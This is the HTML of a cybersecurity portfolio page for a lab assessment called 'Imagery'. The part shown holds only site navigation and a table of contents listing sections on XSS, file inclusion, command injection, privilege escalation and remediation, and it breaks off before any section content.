
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
        <meta name="description" content="Reportistica tecnica, assessment AD/Web/Network, threat modeling e remediation strategy.">
      
      
        <meta name="author" content="Ing. Marco P.">
      
      
        <link rel="canonical" href="https://marcop-sed.github.io/portfolio/en/imagery/">
      
      
        <link rel="prev" href="../">
      
      
        <link rel="next" href="../expressway/">
      
      
        
          <link rel="alternate" href="./" hreflang="en">
        
          <link rel="alternate" href="../../imagery/" hreflang="it">
        
      
      
      <link rel="icon" href="../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.7.6">
    
    
      
        <title>Web Application - Imagery - Marco Pulicanò - Offensive Security & Engineering Portfolio</title>
      
    
    
      <link rel="stylesheet" href="../../assets/stylesheets/main.484c7ddc.min.css">
      
        
        <link rel="stylesheet" href="../../assets/stylesheets/palette.ab4e12ef.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Inter:300,300i,400,400i,700,700i%7CJetBrains+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Inter";--md-code-font:"JetBrains Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="red">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#lab-assessment-imagery-scenario" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

  

<header class="md-header md-header--shadow md-header--lifted" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../" title="Marco Pulicanò - Offensive Security &amp; Engineering Portfolio" class="md-header__button md-logo" aria-label="Marco Pulicanò - Offensive Security & Engineering Portfolio" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a1 1 0 0 1 1 1 1 1 0 0 1-1 1 1 1 0 0 1-1-1 1 1 0 0 1 1-1m9 3c0 5.55-3.84 10.74-9 12-5.16-1.26-9-6.45-9-12V5l9-4 9 4zm-9-5a3 3 0 0 0-3 3c0 1.31.83 2.42 2 2.83V18h2v-2h2v-2h-2v-2.17c1.17-.41 2-1.52 2-2.83a3 3 0 0 0-3-3"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            Marco Pulicanò - Offensive Security & Engineering Portfolio
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Web Application - Imagery
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="black" data-md-color-accent="red"  aria-label="Dark Mode"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Dark Mode" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a4 4 0 0 0-4 4 4 4 0 0 0 4 4 4 4 0 0 0 4-4 4 4 0 0 0-4-4m0 10a6 6 0 0 1-6-6 6 6 0 0 1 6-6 6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="black" data-md-color-accent="red"  aria-label="Light Mode"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Light Mode" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 18c-.89 0-1.74-.2-2.5-.55C11.56 16.5 13 14.42 13 12s-1.44-4.5-3.5-5.45C10.26 6.2 11.11 6 12 6a6 6 0 0 1 6 6 6 6 0 0 1-6 6m8-9.31V4h-4.69L12 .69 8.69 4H4v4.69L.69 12 4 15.31V20h4.69L12 23.31 15.31 20H20v-4.69L23.31 12z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
      <div class="md-header__option">
  <div class="md-select">
    
    <button class="md-header__button md-icon" aria-label="Select language">
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m12.87 15.07-2.54-2.51.03-.03A17.5 17.5 0 0 0 14.07 6H17V4h-7V2H8v2H1v2h11.17C11.5 7.92 10.44 9.75 9 11.35 8.07 10.32 7.3 9.19 6.69 8h-2c.73 1.63 1.73 3.17 2.98 4.56l-5.09 5.02L4 19l5-5 3.11 3.11zM18.5 10h-2L12 22h2l1.12-3h4.75L21 22h2zm-2.62 7 1.62-4.33L19.12 17z"/></svg>
    </button>
    <div class="md-select__inner">
      <ul class="md-select__list">
        
          <li class="md-select__item">
            <a href="./" hreflang="en" class="md-select__link">
              English
            </a>
          </li>
        
          <li class="md-select__item">
            <a href="../../imagery/" hreflang="it" class="md-select__link">
              Italiano
            </a>
          </li>
        
      </ul>
    </div>
  </div>
</div>
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
        <div class="md-search__suggest" data-md-component="search-suggest"></div>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
  </nav>
  
    
      
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    <li class="md-tabs__item">
      <a href="../" class="md-tabs__link">
        
  
  
    
  
  🏠 Home

      </a>
    </li>
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="./" class="md-tabs__link">
          
  
  
  🔴 Offensive Security

        </a>
      </li>
    
  

      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../lazypwn/" class="md-tabs__link">
          
  
  
  ⚙️ Projects

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
    
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../" title="Marco Pulicanò - Offensive Security &amp; Engineering Portfolio" class="md-nav__button md-logo" aria-label="Marco Pulicanò - Offensive Security & Engineering Portfolio" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a1 1 0 0 1 1 1 1 1 0 0 1-1 1 1 1 0 0 1-1-1 1 1 0 0 1 1-1m9 3c0 5.55-3.84 10.74-9 12-5.16-1.26-9-6.45-9-12V5l9-4 9 4zm-9-5a3 3 0 0 0-3 3c0 1.31.83 2.42 2 2.83V18h2v-2h2v-2h-2v-2.17c1.17-.41 2-1.52 2-2.83a3 3 0 0 0-3-3"/></svg>

    </a>
    Marco Pulicanò - Offensive Security & Engineering Portfolio
  </label>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    <li class="md-nav__item">
      <a href="../" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    🏠 Home
  

    
  </span>
  
  

      </a>
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    
  
    🔴 Offensive Security
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            
  
    🔴 Offensive Security
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    
  
    Web Application - Imagery
  

    
  </span>
  
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    
  
    Web Application - Imagery
  

    
  </span>
  
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1-executive-summary" class="md-nav__link">
    <span class="md-ellipsis">
      
        1. Executive Summary
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-applied-methodology" class="md-nav__link">
    <span class="md-ellipsis">
      
        2. Applied Methodology
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. Applied Methodology">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-reference-frameworks" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.1 Reference Frameworks
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-engagement-scope" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.2 Engagement Scope
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-attack-path-kill-chain" class="md-nav__link">
    <span class="md-ellipsis">
      
        3. Attack Path (Kill Chain)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-proof-of-concept-poc-technical-evidence" class="md-nav__link">
    <span class="md-ellipsis">
      
        4. Proof of Concept (PoC) &amp; Technical Evidence
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4. Proof of Concept (PoC) &amp; Technical Evidence">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#41-reconnaissance-initial-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.1 Reconnaissance &amp; Initial Enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#42-owasp-a072021-cross-site-scripting-xss-blind-variant" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-identification" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Identification
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-blind-xss-payload" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Blind XSS Payload
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#43-session-manipulation-admin-panel-access" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.3 Session Manipulation &amp; Admin Panel Access
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#44-owasp-a012021-local-file-inclusion-lfi" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.4 OWASP A01:2021 – Local File Inclusion (LFI)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.4 OWASP A01:2021 – Local File Inclusion (LFI)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-identification_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Identification
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-source-code-disclosure" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Source Code Disclosure
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#45-credential-extraction-password-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.5 Credential Extraction &amp; Password Cracking
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.5 Credential Extraction &amp; Password Cracking">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#database-leak-analysis" class="md-nav__link">
    <span class="md-ellipsis">
      
        Database Leak Analysis
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#hash-identification-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        Hash Identification &amp; Cracking
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#46-owasp-a032021-os-command-injection-via-image-processing" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.6 OWASP A03:2021 – OS Command Injection via Image Processing
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.6 OWASP A03:2021 – OS Command Injection via Image Processing">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-discovery-in-source-code" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Discovery in Source Code
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-strategy" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation Strategy
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#proof-of-concept-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      
        Proof of Concept: Reverse Shell
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#47-privilege-escalation-lateral-movement-to-mark" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.7 Privilege Escalation – Lateral Movement to 'mark'
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.7 Privilege Escalation – Lateral Movement to &#39;mark&#39;">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#system-users-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        System users enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#credential-reuse-attack" class="md-nav__link">
    <span class="md-ellipsis">
      
        Credential Reuse Attack
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#48-privilege-escalation-root-access-via-charcol-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.8 Privilege Escalation – Root Access via Charcol + Cronjob
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.8 Privilege Escalation – Root Access via Charcol + Cronjob">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#sudo-privileges-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        Sudo privileges enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#charcol-analysis" class="md-nav__link">
    <span class="md-ellipsis">
      
        Charcol Analysis
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-via-cronjob" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation via Cronjob
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#activation-root-access" class="md-nav__link">
    <span class="md-ellipsis">
      
        Activation &amp; Root Access
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#root-flag" class="md-nav__link">
    <span class="md-ellipsis">
      
        Root Flag
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-remediation-hardening-proposals" class="md-nav__link">
    <span class="md-ellipsis">
      
        5. Remediation &amp; Hardening (Proposals)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5. Remediation &amp; Hardening (Proposals)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#51-mitigation-of-identified-vulnerabilities" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1 Mitigation of Identified Vulnerabilities
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="5.1 Mitigation of Identified Vulnerabilities">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#511-cross-site-scripting-xss-owasp-a072021" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.1 Cross-Site Scripting (XSS) – OWASP A07:2021
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#512-local-file-inclusion-lfi-owasp-a012021-cwe-22" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.2 Local File Inclusion (LFI) – OWASP A01:2021 / CWE-22
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#513-os-command-injection-owasp-a032021-cwe-78" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.3 OS Command Injection – OWASP A03:2021 / CWE-78
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#514-weak-password-storage-cwe-916" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.4 Weak Password Storage – CWE-916
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#515-unauthorized-admin-access-cwe-639" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.5 Unauthorized Admin Access – CWE-639
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#516-sudo-misuse-cwe-269" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.1.6 Sudo Misuse – CWE-269
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#52-compliance-standards-mapping" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.2 Compliance &amp; Standards Mapping
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#53-testing-validation-roadmap" class="md-nav__link">
    <span class="md-ellipsis">
      
        5.3 Testing &amp; Validation Roadmap
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-conclusions" class="md-nav__link">
    <span class="md-ellipsis">
      
        6. Conclusions
      
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../expressway/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Network & Crypto - Expressway
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../darkzero/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    AD Infrastructure - DarkZero
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../signed/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Kerberos & SQL - Signed
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_3" >
        
          
          <label class="md-nav__link" for="__nav_3" id="__nav_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    
  
    ⚙️ Projects
  

    
  </span>
  
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_3">
            <span class="md-nav__icon md-icon"></span>
            
  
    ⚙️ Projects
  

          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../lazypwn/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    LazyPwn CTF Orchestrator
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../eth/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    
  
    Boot2Root Design - Anime Gallery
  

    
  </span>
  
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#1-executive-summary" class="md-nav__link">
    <span class="md-ellipsis">
      
        1. Executive Summary
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-applied-methodology" class="md-nav__link">
    <span class="md-ellipsis">
      
        2. Applied Methodology
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. Applied Methodology">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-reference-frameworks" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.1 Reference Frameworks
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-engagement-scope" class="md-nav__link">
    <span class="md-ellipsis">
      
        2.2 Engagement Scope
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-attack-path-kill-chain" class="md-nav__link">
    <span class="md-ellipsis">
      
        3. Attack Path (Kill Chain)
      
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-proof-of-concept-poc-technical-evidence" class="md-nav__link">
    <span class="md-ellipsis">
      
        4. Proof of Concept (PoC) &amp; Technical Evidence
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4. Proof of Concept (PoC) &amp; Technical Evidence">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#41-reconnaissance-initial-enumeration" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.1 Reconnaissance &amp; Initial Enumeration
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#42-owasp-a072021-cross-site-scripting-xss-blind-variant" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.2 OWASP A07:2021 – Cross-Site Scripting (XSS) – Blind Variant">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-identification" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Identification
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-blind-xss-payload" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Blind XSS Payload
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#43-session-manipulation-admin-panel-access" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.3 Session Manipulation &amp; Admin Panel Access
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#44-owasp-a012021-local-file-inclusion-lfi" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.4 OWASP A01:2021 – Local File Inclusion (LFI)
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.4 OWASP A01:2021 – Local File Inclusion (LFI)">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-identification_1" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Identification
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-source-code-disclosure" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation – Source Code Disclosure
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#45-credential-extraction-password-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.5 Credential Extraction &amp; Password Cracking
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.5 Credential Extraction &amp; Password Cracking">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#database-leak-analysis" class="md-nav__link">
    <span class="md-ellipsis">
      
        Database Leak Analysis
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#hash-identification-cracking" class="md-nav__link">
    <span class="md-ellipsis">
      
        Hash Identification &amp; Cracking
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#46-owasp-a032021-os-command-injection-via-image-processing" class="md-nav__link">
    <span class="md-ellipsis">
      
        4.6 OWASP A03:2021 – OS Command Injection via Image Processing
      
    </span>
  </a>
  
    <nav class="md-nav" aria-label="4.6 OWASP A03:2021 – OS Command Injection via Image Processing">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#vulnerability-discovery-in-source-code" class="md-nav__link">
    <span class="md-ellipsis">
      
        Vulnerability Discovery in Source Code
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#exploitation-strategy" class="md-nav__link">
    <span class="md-ellipsis">
      
        Exploitation Strategy
      
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#proof-of-concept-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      
        Proof of Concept: Reverse Shell
      
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
        
          <li class="md-nav__item">
  <a href="#47-privilege-escalation-lateral-movement-to-mark" class="md-nav__link">
    <span class="md-ellipsis">
      
